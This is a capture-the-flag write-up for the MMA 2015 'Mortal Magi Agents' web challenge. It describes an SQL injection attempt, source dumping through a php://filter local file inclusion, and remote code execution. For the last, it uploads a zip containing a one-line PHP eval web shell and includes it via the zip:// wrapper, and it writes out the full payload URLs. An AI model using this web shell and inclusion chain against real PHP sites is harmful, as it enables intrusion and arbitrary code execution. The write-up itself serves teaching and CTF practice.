English [MMA 2015] [Web – Mortal Magi Agents] Write Up

Description

We were given a link to the challenge:
http://magiagents.chal.mmactf.link

Resolution

We registered/logged ourselves to test the website.

The only thing we can do is uploading an avatar on the settings page.
http://magiagents.chal.mmactf.link/index.php?page=settings

We tried some image formats like png/jpg and some others, php for example.
The extensions .jpg, .png were kept, but of course .php was removed.
Uploaded file name result was like : <user><sha1 of the file content>[<extension>] in the avators directory.

We found 2 potential ways to solve this challenge:

  1. an SQL injection, in the login parameter
    http://magiagents.chal.mmactf.link/index.php?page=login
    We dumped the db magiagents, and tables admins/users.
  2. a Local File Inclusion, using PHP wrappers
    http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=settings (page name, without the .php)
    We dumped all the source code.

We discovered an interesting part of the code in the home.php file:

if (isset($_SESSION["admin"]) && $_SESSION["admin"]) {
 echo file_get_contents("../flag");
}

In the meantime we worked on the SQLi and I must admit after hours and hours, we were stuck…
So we decided to give us another try by using the PHP wrapper in a different manner:
The only thing to do was to upload a file, and include it.
But… how to do this when the extension is not kept during upload ?
The answer is really simple in fact : use a zip file, with a PHP file embedded inside !
Using the PHP zip wrapper, we should be able to extract the “pown.php” from our archive:
As stated in the help, the syntax is :
zip://archive.zip#file.txt

We created a zip file with a PHP file named “pown.php”, with the following code:

<?php eval($_GET['q']); ?>

Then we uploaded our archive, and it was renamed with the userSHA1 template without the .zip extension.
The “.php” was already appended to the requested file name during inclusion :

<?php include("$page.php"); ?>

We can only use “pown” instead of “pown.php” so in our case, the plain text syntax would be :
zip://avators/userSHA1#pown&q=echo file_get_contents('../flag');

URL encoded:
zip://avators/userSHA1%23pown&q=echo%20file_get_contents%28%27../flag%27%29

We requested this URL:
http://magiagents.chal.mmactf.link/index.php?page=zip://avators/userSHA1%23pown&q=echo%20file_get_contents%28%27../flag%27%29

The flag was included in the content of the page:
MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}

Leave a Reply

Your email address will not be published.